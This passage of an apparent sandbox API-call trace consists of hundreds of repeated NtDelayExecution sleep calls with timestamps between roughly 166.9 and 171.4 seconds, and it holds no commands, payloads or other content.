(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0167.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.681] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0168.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0169.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0170.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.417] NtDelayExecution 